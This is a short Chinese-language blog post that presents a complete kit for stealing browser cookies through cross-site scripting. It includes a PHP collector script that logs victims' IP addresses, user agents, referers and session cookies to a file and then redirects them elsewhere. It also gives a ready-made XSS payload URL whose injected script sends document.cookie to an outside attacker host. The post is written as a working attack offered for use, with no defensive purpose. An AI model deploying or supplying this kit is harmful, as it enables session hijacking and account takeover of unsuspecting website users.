利用XSS窃取cookie的php脚本

1.支持PHP 网页

2.网站存在xss的脆弱的地方。
 vb.php为存放cookie的网页
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther – Designed and programmed by R00t[ATI]</title>
</head>
<body bgcolor=”#C0C0C0″>
<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”> </p>
</body>

documents.php取得cookie的网页
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:    “.$referer.”<br>Session: “.$data.”<br><br><br>”;
$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location: http://ashker.Net”);
?>

Vb.php文件是用来收集Cookie和其他信息。
documents.php文件用于抓取资料如: IP地址,用户代理和cookie 。
documents.php是抓住文件的Cookie使用的方法
documents.php?c=”+document.cookie;

Code:
http://www.ashker.Net/vulnerable_page.php?vulnerable_method=<script>document.location=”http://ashker.net/documents.php?c=”+document.cookie;</script>

你可能感兴趣的:(利用XSS窃取cookie的php脚本)